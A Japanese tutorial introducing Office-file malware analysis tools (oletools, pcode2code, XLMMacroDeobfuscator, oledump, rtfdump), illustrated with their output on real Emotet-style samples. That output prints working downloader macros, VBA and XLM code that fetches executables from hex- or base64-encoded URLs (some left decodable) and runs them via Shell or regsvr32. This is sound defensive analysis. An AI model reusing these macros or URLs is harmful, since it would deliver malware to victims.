EmotetやQakbotなどのOfficeファイルのマルウェアが増えてきたので、Officeファイルの解析に使えそうなツールを紹介する。
oletools
OLEファイルの解析に使えるいろんなツールのパッケージみたいなもの。
Pythonで動いており、pipを使ってインストールできる。
全部のツールを説明すると長くなるため、一部紹介する。
oleid
OLEファイルに怪しい部分がないか調査してくれる。
C:\Users\masaomi\Downloads>oleid sample.xls
oleid 0.60.dev1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
Filename: sample.xls
--------------------+--------------------+----------+--------------------------
Indicator |Value |Risk |Description
--------------------+--------------------+----------+--------------------------
File format |MS Excel 97-2003 |info |
|Workbook or Template| |
--------------------+--------------------+----------+--------------------------
Container format |OLE |info |Container type
--------------------+--------------------+----------+--------------------------
Application name |Microsoft Excel |info |Application name declared
| | |in properties
--------------------+--------------------+----------+--------------------------
Properties code page|1252: ANSI Latin 1; |info |Code page used for
|Western European | |properties
|(Windows) | |
--------------------+--------------------+----------+--------------------------
Encrypted |False |none |The file is not encrypted
--------------------+--------------------+----------+--------------------------
VBA Macros |Yes, suspicious |HIGH |This file contains VBA
| | |macros. Suspicious
| | |keywords were found. Use
| | |olevba and mraptor for
| | |more info.
--------------------+--------------------+----------+--------------------------
XLM Macros |No |none |This file does not contain
| | |Excel 4/XLM macros.
--------------------+--------------------+----------+--------------------------
External |0 |none |External relationships
Relationships | | |such as remote templates,
| | |remote OLE objects, etc
--------------------+--------------------+----------+--------------------------
olevba
VBAマクロのコードを抽出し、怪しい部分がないか調査してくれる。
C:\Users\masaomi\Downloads>olevba sample.xls
olevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: sample.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: sample.xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Sheet2.cls
in file: sample.xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Workbook_BeforeClose(Cancel As Boolean)
With ActiveSheet
Dim Prog As String
For Each c In .Comments
If InStr(4, c.Text, "W", 1) Then
Prog = c.Text
CreateObject(c.Text).UILevel = 2
End If
If InStr(4, c.Text, ":", 1) Then
CreateObject(Prog).InstallProduct c.Text
End If
Next
End With
End Sub
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visibl
e - Sheet
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |Workbook_BeforeClose|Runs when the Excel Workbook is closed |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
+----------+--------------------+---------------------------------------------+
oleobj
OLEファイル内のオブジェクトを抽出することができる。
C:¥Users¥masaomi¥Downloads>oleobj sample.xlsm
oleobj 0.56.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
-------------------------------------------------------------------------------
File: 'sample.xlsm'
Found relationship 'hyperlink' with external link hxxps://○○○.com/wp-admin/A
8/%22,%22
Found relationship 'hyperlink' with external link hxxp://○○○.com/replace/
fVea/%22,%22
Found relationship 'hyperlink' with external link hxxp://○○○.com/ren
ew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/wp-cont
ent/Y/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/
thegrandbrands/eGd55tEm9qkPNOhViP/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/
wp-includes/HLDoANj/%22,%22
※URLの一部を置き換えています。
rtfobj
RTFファイル内のオブジェクトを抽出することができる。
C:\Users\masaomi\Downloads>rtfobj sample.doc
rtfobj 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
File: 'sample.doc' - size: 223241 bytes
---+----------+---------------------------------------------------------------
id |index |OLE Object
---+----------+---------------------------------------------------------------
0 |0000095Dh |format_id: 2 (Embedded)
| |class name: b'package'
| |data size: 15717
| |OLE Package object:
| |Filename: 'abdtfhgYgeghDp\x8d.scT'
| |Source path: 'C:\\nsdsTggH\\abdtfhgYgeghDp\x8d.scT'
| |Temp path = 'C:\\CekepaD\x87\\abdtfhgYgeghDp\x8d.scT'
| |MD5 = '789d9c850c8dc9bdeb4a89df5fbab578'
| |EXECUTABLE FILE
| |File Type: Unknown file type
---+----------+---------------------------------------------------------------
1 |00008A01h |format_id: 2 (Embedded)
| |class name: b'OLE2LInk'
| |data size: 2560
| |MD5 = 'a2665c0164f8e68c32273b9b696d9d9e'
| |CLSID: 00000300-0000-0000-C000-000000000046
| |StdOleLink (embedded OLE object - Known Related to
| |CVE-2017-0199, CVE-2017-8570, CVE-2017-8759 or CVE-2018-8174)
---+----------+---------------------------------------------------------------
olebrowse
SSView
OLEファイルのデータストリームを表示したり、編集したりすることができるツール。
埋め込まれている画像やHTMLなども表示してくれる。
pcodedmp/pcode2code
VBAマクロのコードをpcodedmpは逆アセンブル、pcode2codeは逆コンパイルしてくれる。
pcodedmp
C:\Users\masaomi\Downloads>pcodedmp sample.xls
Processing file: sample.xls
===============================================================================
dir stream: _VBA_PROJECT_CUR/VBA/dir
-------------------------------------------------------------------------------
dir stream after decompression:
1358 bytes
dir stream parsed:
00000000: PROJ_SYSKIND:
00000000 01 00 00 00 ....
0000000A: PROJ_LCID:
00000000 09 04 00 00 ....
00000014: PROJ_LCIDINVOKE:
00000000 09 04 00 00 ....
0000001E: PROJ_CODEPAGE:
00000000 E4 04 ..
00000026: PROJ_NAME:
00000000 56 42 41 50 72 6F 6A 65 63 74 VBAProject
00000036: PROJ_DOCSTRING
0000003C: PROJ_UNICODE_DOCSTRING
00000042: PROJ_HELPFILE
00000048: PROJ_UNICODE_HELPFILE
0000004E: PROJ_HELPCONTEXT:
00000000 00 00 00 00 ....
00000058: PROJ_LIBFLAGS:
00000000 00 00 00 00 ....
00000062: PROJ_VERSION:
00000000 58 FF 4F 64 0D 00 X.Od..
0000006E: PROJ_CONSTANTS
00000074: PROJ_UNICODE_CONSTANTS
0000007A: PROJ_REFNAME_PROJ:
00000000 73 74 64 6F 6C 65 stdole
00000086: PROJ_UNICODE_REFNAME_PROJ:
00000000 73 00 74 00 64 00 6F 00 6C 00 65 00 s.t.d.o.l.e.
00000098: PROJ_LIBID_REGISTERED:
00000000 5E 00 00 00 2A 5C 47 7B 30 30 30 32 30 34 33 30 ^...*\G{00020430
00000010 2D 30 30 30 30 2D 30 30 30 30 2D 43 30 30 30 2D -0000-0000-C000-
00000020 30 30 30 30 30 30 30 30 30 30 34 36 7D 23 32 2E 000000000046}#2.
00000030 30 23 30 23 43 3A 5C 57 69 6E 64 6F 77 73 5C 53 0#0#C:\Windows\S
00000040 79 73 57 4F 57 36 34 5C 73 74 64 6F 6C 65 32 2E ysWOW64\stdole2.
00000050 74 6C 62 23 4F 4C 45 20 41 75 74 6F 6D 61 74 69 tlb#OLE Automati
00000060 6F 6E 00 00 00 00 00 00 on......
00000106: PROJ_REFNAME_PROJ:
00000000 4F 66 66 69 63 65 Office
00000112: PROJ_UNICODE_REFNAME_PROJ:
00000000 4F 00 66 00 66 00 69 00 63 00 65 00 O.f.f.i.c.e.
00000124: PROJ_LIBID_REGISTERED:
00000000 9A 00 00 00 2A 5C 47 7B 32 44 46 38 44 30 34 43 ....*\G{2DF8D04C
00000010 2D 35 42 46 41 2D 31 30 31 42 2D 42 44 45 35 2D -5BFA-101B-BDE5-
00000020 30 30 41 41 30 30 34 34 44 45 35 32 7D 23 32 2E 00AA0044DE52}#2.
00000030 30 23 30 23 43 3A 5C 50 72 6F 67 72 61 6D 20 46 0#0#C:\Program F
00000040 69 6C 65 73 20 28 78 38 36 29 5C 43 6F 6D 6D 6F iles (x86)\Commo
00000050 6E 20 46 69 6C 65 73 5C 4D 69 63 72 6F 73 6F 66 n Files\Microsof
00000060 74 20 53 68 61 72 65 64 5C 4F 46 46 49 43 45 31 t Shared\OFFICE1
00000070 32 5C 4D 53 4F 2E 44 4C 4C 23 4D 69 63 72 6F 73 2\MSO.DLL#Micros
00000080 6F 66 74 20 4F 66 66 69 63 65 20 31 32 2E 30 20 oft Office 12.0
00000090 4F 62 6A 65 63 74 20 4C 69 62 72 61 72 79 00 00 Object Library..
000000A0 00 00 00 00 ....
以下省略
-dをつけると、p-codeのみが逆アセンブルされる。
C:\Users\masaomi\Downloads>pcodedmp -d sample.xls
Processing file: sample.xls
===============================================================================
Module streams:
_VBA_PROJECT_CUR/VBA/ThisWorkbook - 3553 bytes
Line #0:
FuncDefn (Private Sub jkmyjkgeozuikp())
Line #1:
Dim
VarDefn abzpluxvhrslhaqrd (As String)
Line #2:
Dim
VarDefn dzclesss (As String)
Line #3:
Dim
VarDefn aemngpsicijyqastoqi (As Object)
VarDefn oklqeyqirsr (As Object)
Line #4:
Dim
VarDefn zuqxesnr (As Integer)
Line #5:
LitStr 0x003E "68747470733a2f2f7472616e736665722e73682f796c6a7548752f30303031"
ArgsLd ggwyizkwoeai 0x0001
LitStr 0x0016 "4b4c43323032322e657865"
ArgsLd ggwyizkwoeai 0x0001
Concat
St abzpluxvhrslhaqrd
以下省略
pcode2code
pcode2codeはpcodedmpの出力をもとに、VBAマクロのコードを逆コンパイルしている。
C:\Users\masaomi\Downloads>pcode2code sample.xls
stream : _VBA_PROJECT_CUR/VBA/ThisWorkbook - 3553 bytes
########################################
Private Sub jkmyjkgeozuikp()
Dim abzpluxvhrslhaqrd As String
Dim dzclesss As String
Dim aemngpsicijyqastoqi As Object, oklqeyqirsr As Object
Dim zuqxesnr As Integer
abzpluxvhrslhaqrd = ggwyizkwoeai("68747470733a2f2f7472616e736665722e73682f796c6a7548752f30303031") & ggwyizkwoeai("4b4c43323032322e657865")
dzclesss = ggwyizkwoeai("6b") & ggwyizkwoeai("6c632e657865")
dzclesss = Environ("TEMP") & "\" & dzclesss
Set aemngpsicijyqastoqi = CreateObject(ggwyizkwoeai("4d53584d4c322e536572766572") & ggwyizkwoeai("584d4c485454502e362e30"))
aemngpsicijyqastoqi.setOption(2) = 13056
aemngpsicijyqastoqi.Open ggwyizkwoeai("474554"), abzpluxvhrslhaqrd, False
aemngpsicijyqastoqi.setRequestHeader ggwyizkwoeai("557365") & ggwyizkwoeai("722d4167656e74"), ggwyizkwoeai("4d6f7a69") & ggwyizkwoeai("6c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e5420352e3029")
aemngpsicijyqastoqi.Send
If aemngpsicijyqastoqi.Status = 200 Then
Set oklqeyqirsr = CreateObject(ggwyizkwoeai("41") & ggwyizkwoeai("444f44422e53747265616d"))
oklqeyqirsr.Open
oklqeyqirsr.Type = 1
oklqeyqirsr.Xor aemngpsicijyqastoqi.ResponseBody
oklqeyqirsr.SaveToFile dzclesss, 2
oklqeyqirsr.Close
mxjnxrbn dzclesss
End If
End Sub
以下省略
XLMMacroDeobfuscator
難読化されたXLMマクロのデコードしてくれるツール
oletoolsにも内包されている。
C:\Users\masaomi\Downloads>xlmdeobfuscator --file sample.xls
_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _____
__ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___
)\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| (
) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___
) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___
| | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | (
) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| )
( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/
\| )_( (_______)|/ \__/
XLMMacroDeobfuscator(v0.2.5) - https://github.com/DissectMalware/XLMMacroDeobfus
cator
File: C:\Users\masaomi\Downloads\sample.xls
Unencrypted xls file
[Loading Cells]
auto_open: auto_open->'EGVEB'!$D$1
[Starting Deobfuscation]
CELL:D5 , FullEvaluation , "False"
CELL:D9 , FullEvaluation , CALL("urlmon","URLDownloadToFileA,JJCCBB"
,0,"hxxp://○○○.com/wp-content/Cw3aR6792f/","..\nhth.dll",0,0)
CELL:D11 , FullEvaluation , IF(UJFD1<0,CALL("urlmon","URLDownloadToFi
leA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○
"&"○"&"○"&"○"&"○.○"&"○"&"○/i"&"n"&"v"&"o"&"i"&"c"&"e/"&"m/","..\nhth.dll",0,0))
CELL:D13 , FullEvaluation , IF(UJFD2<0,CALL("urlmon","URLDownloadToFi
leA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○
.○"&"○"&"○/d"&"o"&"w"&"n"&"l"&"o"&"a"&"d"&"s/8"&"d"&"R9"&"p"&"g"&"N"&"B"&"F"&"t"
&"z/","..\nhth.dll",0,0))
CELL:D15 , FullEvaluation , IF(UJFD3<0,CALL("urlmon","URLDownloadToFi
leA,JJCCBB",0,"h"&"t"&"tp"&"s:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○
"&"○"&"○"&"○"&"○.○"&"○"&"○/w"&"p-in"&"clu"&"de"&"s/v"&"2"&"q"&"F"&"A"&"l"&"M"&"
Z"&"E"&"L"&"R"&"k"&"xb"&"z/","..\nhth.dll",0,0))
CELL:D17 , FullEvaluation , IF(UJFD4<0,CALL("urlmon","URLDownloadToFi
leA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○"&"○"&"○"&"○"&"○"&
"○.○"&"○"&"○/w"&"p-c"&"o"&"n"&"t"&"e"&"n"&"t/s"&"S"&"J"&"q"&"J/","..\nhth.dll",0
,0))
CELL:D19 , FullEvaluation , IF(UJFD5<0,CALL("urlmon","URLDownloadToFi
leA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/w
"&"p-i"&"n"&"cl"&"u"&"d"&"e"&"s/T"&"5"&"q"&"X"&"A"&"R"&"8"&"p"&"5/","..\nhth.dll
",0,0))
CELL:D23 , FullEvaluation , IF(UJFD6<0,CLOSE(0),)
CELL:D25 , PartialEvaluation , =EXEC("C:\Windows\SysWow64\regsvr32.exe -
s ..\nhth.dll")
CELL:D29 , FullEvaluation , RETURN()
Files:
[END of Deobfuscation]
time elapsed: 0.2964000701904297
※URL及び文字列の一部を置き換えています。
DidierStevensSuite
いろんなものの解析に役に立つツールのパッケージみたいなもの。
この中から、Officeファイルの解析に役に立ちそうなものを一部紹介する。
oledump.py
OLEファイルの解析をしてくれる。
オプションを付けずにそのまま実行すると、データストリームの一覧を表示する。
Mやmが付いている番号はマクロがあることを示している。
Attribute文やOptions文以外の文があるとMになり、ないとmになる。
C:¥Users¥masaomi¥Downloads¥DidierStevensSuite>oledump.py sample.xls
1: 102 '¥x01CompObj'
2: 236 '¥x05DocumentSummaryInformation'
3: 180 '¥x05SummaryInformation'
4: 16381 'Workbook'
5: 449 '_VBA_PROJECT_CUR/PROJECT'
6: 77 '_VBA_PROJECT_CUR/PROJECTwm'
7: 2813 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
8: 1545 '_VBA_PROJECT_CUR/VBA/__SRP_0'
9: 155 '_VBA_PROJECT_CUR/VBA/__SRP_1'
10: 170 '_VBA_PROJECT_CUR/VBA/__SRP_2'
11: 170 '_VBA_PROJECT_CUR/VBA/__SRP_3'
12: M 1345 '_VBA_PROJECT_CUR/VBA/abdfiihow'
13: 563 '_VBA_PROJECT_CUR/VBA/dir'
14: m 990 '_VBA_PROJECT_CUR/VBA/Лист1'
15: M 2375 '_VBA_PROJECT_CUR/VBA/ЭтаКнига'
「-s ストリーム番号」をつけると対象のストリームの中身を見ることができる。
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 1 sample.xls
00000000: 01 00 FE FF 03 0A 00 00 FF FF FF FF 20 08 02 00 ............ ...
00000010: 00 00 00 00 C0 00 00 00 00 00 00 46 1A 00 00 00 ...........F....
00000020: CB E8 F1 F2 20 4D 69 63 72 6F 73 6F 66 74 20 45 .... Microsoft E
00000030: 78 63 65 6C 20 32 30 30 33 00 06 00 00 00 42 69 xcel 2003.....Bi
00000040: 66 66 38 00 0E 00 00 00 45 78 63 65 6C 2E 53 68 ff8.....Excel.Sh
00000050: 65 65 74 2E 38 00 F4 39 B2 71 00 00 00 00 00 00 eet.8..9.q......
00000060: 00 00 00 00 00 00 ......
また、「-S」を追加すると文字列だけ抽出できる。
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 1 -S sample.xls
Microsoft Excel 2003
Biff8
Excel.Sheet.8
「-v」を追加すると、VBAマクロを表示してくれる。
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 15 -v sample.xls
Attribute VB_Name = "????????"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Application.ScreenUpdating = False
Dim xHttp: Set jgccsmkbfbunzevjs = CreateObject(rkixcetefmdfoip("4d6963726f736f6
6742e584d") & rkixcetefmdfoip("4c48545450"))
Dim bStrm: Set ecxtnnvma = CreateObject(rkixcetefmdfoip("41646f64") & rkixcetefm
dfoip("622e53747265616d"))
jgccsmkbfbunzevjs.Open rkixcetefmdfoip("474554"), rkixcetefmdfoip("687474703a")
& rkixcetefmdfoip("2f2f3136382e3130302e382e34322f737069736f6b2e657865"), False
jgccsmkbfbunzevjs.Send
Dim leicqooi As String
leicqooi = Environ("AppData")
With ecxtnnvma
.Type = 1
.Open
.write jgccsmkbfbunzevjs.responseBody
.savetofile leicqooi & rkixcetefmdfoip("5c72756e73782e65") & rkixcetefmdfoip("78
65"), 2
End With
Shell (leicqooi & rkixcetefmdfoip("5c72") & rkixcetefmdfoip("756e73782e657865"))
Application.ScreenUpdating = True
End Sub
rtfdump.py
RTFファイルを解析してくれる。
オプションとかはoledump.pyに似ている。
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py sample.doc
1 Level 1 c= 7 p=00000000 l= 223239 h= 219001; 135857 b=
0 u= 292 \rtf
2 Level 2 c= 0 p=000000b2 l= 1644 h= 158; 23 b=
0 u= 203 \lsdlockedexcept
3 Level 2 c= 1 p=000007e6 l= 177 h= 34; 8 b=
0 u= 65 \rtlch
4 Level 3 c= 0 p=00000877 l= 17 h= 6; 2 b=
0 u= 7 \b
5 Level 2 c= 2 p=000008ab l= 32939 h= 31514; 286 b=
0 O u= 0 \object
Name: b'package\x00' Size: 15717 md5: a47631a4dcc39d2f2704709899b91cf6 mag
ic: 02006162
6 Level 3 c= 0 p=000008bf l= 145 h= 0; 10 b=
0 u= 0 \objw1
7 Level 3 c= 0 p=00000954 l= 32761 h= 31514; 286 b=
0 O u= 0 \objdata
Name: b'package\x00' Size: 15717 md5: a47631a4dcc39d2f2704709899b91cf6 mag
ic: 02006162
8 Level 2 c= 2 p=00008958 l= 5442 h= 5270; 4154 b=
0 u= 14 \object
9 Level 3 c= 0 p=00008967 l= 27 h= 5; 1 b=
0 u= 10 \*\objclass Word.Document.8
10 Level 3 c= 1 p=00008984 l= 5397 h= 5267; 4154 b=
0 u= 4 \objdat
11 Level 4 c= 2 p=0000898e l= 5386 h= 5265; 4154 b=
0 O u= 4 \dptxbxtext
Name: b'OLE2LInk\x00' Size: 2560 md5: a2665c0164f8e68c32273b9b696d9d9e mag
ic: d0cf11e0
12 Level 5 c= 0 p=000089dd l= 6 h= 0; 0 b=
0 u= 2 \ud
13 Level 5 c= 0 p=000089ef l= 6 h= 0; 0 b=
0 u= 2 \ud
14 Level 2 c= 1 p=00009e9e l= 24862 h= 24599; 24595 b=
0 u= 10 \shprslt
15 Level 3 c= 1 p=00009ea7 l= 24852 h= 24599; 24595 b=
0 u= 10 \*\do
16 Level 4 c= 1 p=00009ed5 l= 24805 h= 24599; 24595 b=
0 u= 10 \dptxbxtext
17 Level 5 c= 1 p=00009f1e l= 24731 h= 24599; 24595 b=
0 u= 10 \pard
18 Level 6 c= 2 p=00009f5c l= 24668 h= 24599; 24595 b=
0 u= 10 \object
19 Level 7 c= 0 p=00009f7f l= 26 h= 4; 1 b=
0 u= 10 \*\objclass Word.Picture.8
20 Level 7 c= 0 p=00009f9b l= 24604 h= 24596; 24595 b=
0 u= 1 \objda
21 Level 2 c= 1 p=0000ffbe l= 21693 h= 21537; 21537 b=
0 u= 0 \pict
22 Level 3 c= 0 p=0001004e l= 21548 h= 21537; 21537 b=
0 u= 0 \*\blipuid
23 Level 2 c= 1 p=0001547d l= 136071 h= 135889; 135857 b=
0 u= 0 \nonshppict
24 Level 3 c= 1 p=00015489 l= 136058 h= 135889; 135857 b=
0 u= 0 \pict
25 Level 4 c= 0 p=00015526 l= 43 h= 32; 32 b=
0 u= 0 \*\blipuid
「-O」をつけるとオブジェクトがあるものだけ表示する。
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -O sample.doc
1: Name: b'package\x00'
Magic: b'02006162'
Size: 15717
Hash: md5 a47631a4dcc39d2f2704709899b91cf6
2: Name: b'OLE2LInk\x00'
Magic: b'd0cf11e0'
Size: 2560
Hash: md5 a2665c0164f8e68c32273b9b696d9d9e
「-s ストリーム番号」をつけると対象のストリームの中身を見ることができる。
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 3 sample.doc
00000000: 5C 66 63 73 31 20 5C 61 66 33 31 35 30 37 20 5C \fcs1 \af31507 \
00000010: 6C 74 72 63 68 5C 66 63 73 30 20 5C 69 6E 73 72 ltrch\fcs0 \insr
00000020: 73 69 64 34 39 33 32 35 39 33 20 0D 0A 4D 69 63 sid4932593 ..Mic
00000030: 72 6F 73 6F 66 74 20 4F 66 66 69 63 65 20 64 6F rosoft Office do
00000040: 65 73 20 6E 6F 74 20 77 6F 72 6B 20 69 6E 20 65 es not work in e
00000050: 6D 61 69 6C 20 50 72 65 76 69 65 77 2E 5C 6C 69 mail Preview.\li
00000060: 6E 65 20 50 6C 65 61 73 65 20 64 6F 77 6E 6C 6F ne Please downlo
00000070: 61 64 20 74 68 65 20 64 6F 63 75 6D 65 6E 74 20 ad the document
00000080: 61 6E 64 20 63 6C 69 63 6B 20 7B 5C 62 20 45 6E and click {\b En
00000090: 61 62 6C 65 20 45 64 69 74 69 6E 67 7D 20 77 68 able Editing} wh
000000A0: 65 6E 20 6F 70 65 6E 69 6E 67 2E en opening.
また、「-H」を追加するとデコードしてくれる。
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 7 -H sample.doc
00000000: 01 05 00 00 02 00 00 00 08 00 00 00 70 61 63 6B ............pack
00000010: 61 67 65 00 00 00 00 00 00 00 00 00 65 3D 00 00 age.........e=..
00000020: 02 00 61 62 64 74 66 68 67 59 67 65 67 68 44 70 ..abdtfhgYgeghDp
00000030: 8D 2E 73 63 54 00 43 3A 5C 6E 73 64 73 54 67 67 ..scT.C:\nsdsTgg
00000040: 48 5C 61 62 64 74 66 68 67 59 67 65 67 68 44 70 H\abdtfhgYgeghDp
00000050: 8D 2E 73 63 54 00 00 00 03 00 20 00 00 00 43 3A ..scT..... ...C:
00000060: 5C 43 65 6B 65 70 61 44 87 5C 61 62 64 74 66 68 \CekepaD.\abdtfh
00000070: 67 59 67 65 67 68 44 70 8D 2E 73 63 54 00 9E 78 gYgeghDp..scT..x
00000080: 00 00 0D 0A 3C 73 63 72 69 70 74 6C 65 54 0D 0A ....<scriptleT..
00000090: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3E >
000000A0: 0D 0A 3C 73 63 72 69 70 74 20 6C 61 6E 67 75 61 ..<script langua
000000B0: 67 65 20 3D 20 27 76 62 73 63 72 69 70 74 27 3E ge = 'vbscript'>
000000C0: 0D 0A 0D 0A 66 73 64 66 64 73 66 73 20 3D 20 22 ....fsdfdsfs = "
000000D0: 61 48 52 30 55 44 6F 76 4C 33 64 6C 62 47 78 6A aHR0UDovL3dlbGxj
000000E0: 59 57 78 73 63 79 35 6A 62 32 30 76 55 6D 56 6C YWxscy5jb20vUmVl
000000F0: 62 47 5A 79 59 57 31 6C 4C 6D 56 34 5A 51 3D 3D bGZyYW1lLmV4ZQ==
00000100: 22 20 27 6E 63 6D 78 62 36 35 37 34 0D 0A 79 75 " 'ncmxb6574..yu
00000110: 6C 6B 79 74 6A 74 72 68 74 6A 72 6B 64 73 61 72 lkytjtrhtjrkdsar
00000120: 6A 6B 79 20 3D 22 55 6D 56 6C 62 47 5A 79 59 57 jky ="UmVlbGZyYW
00000130: 31 6C 4C 6D 56 34 5A 51 3D 3D 22 20 27 6E 63 6D 1lLmV4ZQ==" 'ncm
00000140: 78 62 36 35 37 34 0D 0A 0D 0A 6D 6A 66 76 79 67 xb6574....mjfvyg
00000150: 67 68 65 62 6A 74 65 66 20 3D 20 22 62 22 0D 0A ghebjtef = "b"..
00000160: 77 73 6C 61 75 73 66 79 63 68 6B 73 20 3D 20 6D wslausfychks = m
00000170: 6A 66 76 79 67 67 68 65 62 6A 74 65 66 20 2B 20 jfvygghebjtef +
00000180: 22 69 6E 22 0D 0A 77 73 6C 61 75 73 66 79 63 68 "in"..wslausfych
00000190: 6B 73 20 3D 20 77 73 6C 61 75 73 66 79 63 68 6B ks = wslausfychk
000001A0: 73 20 2B 20 22 2E 22 0D 0A 77 73 6C 61 75 73 66 s + "."..wslausf
000001B0: 79 63 68 6B 73 20 3D 20 77 73 6C 61 75 73 66 79 ychks = wslausfy
000001C0: 63 68 6B 73 20 2B 20 6D 6A 66 76 79 67 67 68 65 chks + mjfvygghe
000001D0: 62 6A 74 65 66 0D 0A 77 73 6C 61 75 73 66 79 63 bjtef..wslausfyc
000001E0: 68 6B 73 20 3D 20 77 73 6C 61 75 73 66 79 63 68 hks = wslausfych
000001F0: 6B 73 20 2B 20 22 61 22 0D 0A 77 73 6C 61 75 73 ks + "a"..wslaus
00000200: 66 79 63 68 6B 73 20 3D 20 77 73 6C 61 75 73 66 fychks = wslausf
00000210: 79 63 68 6B 73 20 2B 20 22 73 22 0D 0A 77 73 6C ychks + "s"..wsl
00000220: 61 75 73 66 79 63 68 6B 73 20 3D 20 77 73 6C 61 ausfychks = wsla
00000230: 75 73 66 79 63 68 6B 73 20 2B 20 22 65 22 0D 0A usfychks + "e"..
00000240: 77 73 6C 61 75 73 66 79 63 68 6B 73 20 3D 20 77 wslausfychks = w
00000250: 73 6C 61 75 73 66 79 63 68 6B 73 20 2B 20 22 36 slausfychks + "6
00000260: 22 0D 0A 77 73 6C 61 75 73 66 79 63 68 6B 73 20 "..wslausfychks
00000270: 3D 20 77 73 6C 61 75 73 66 79 63 68 6B 73 20 2B = wslausfychks +
00000280: 20 22 22 20 2B 20 22 34 22 0D 0A 0D 0A 46 75 6E "" + "4"....Fun
00000290: 63 74 69 6F 6E 20 61 67 65 36 34 50 72 6F 63 6F ction age64Proco
000002A0: 64 65 28 42 79 56 61 6C 20 63 76 77 74 72 35 79 de(ByVal cvwtr5y
000002B0: 63 62 76 65 2C 20 42 79 56 61 6C 20 74 72 74 73 cbve, ByVal trts
000002C0: 6B 34 38 34 74 33 37 38 29 0D 0A 20 20 20 20 44 k484t378).. D
000002D0: 69 6D 20 78 74 65 78 65 6E 63 0D 0A 20 20 20 20 im xtexenc..
以下省略
また、「-d」を追加すると文字列だけ抽出できる。
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 3 -d sample.doc
\fcs1 \af31507 \ltrch\fcs0 \insrsid4932593
Microsoft Office does not work in email Preview.\line Please download the docume
nt and click {\b Enable Editing} when opening.
zipdump.py
ZIPファイルを解析してくれるツールだが、Officeファイルの解析にも使える。
オプションとかはoledump.pyに似ている。
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py sample.xlsm
Index Filename Encrypted Timestamp
1 [Content_Types].xml 0 1980-01-01 00:00:00
2 _rels/.rels 0 1980-01-01 00:00:00
3 xl/workbook.xml 0 1980-01-01 00:00:00
4 xl/_rels/workbook.xml.rels 0 1980-01-01 00:00:00
5 xl/worksheets/sheet1.xml 0 1980-01-01 00:00:00
6 xl/worksheets/sheet2.xml 0 1980-01-01 00:00:00
7 xl/worksheets/sheet3.xml 0 1980-01-01 00:00:00
8 xl/worksheets/sheet4.xml 0 1980-01-01 00:00:00
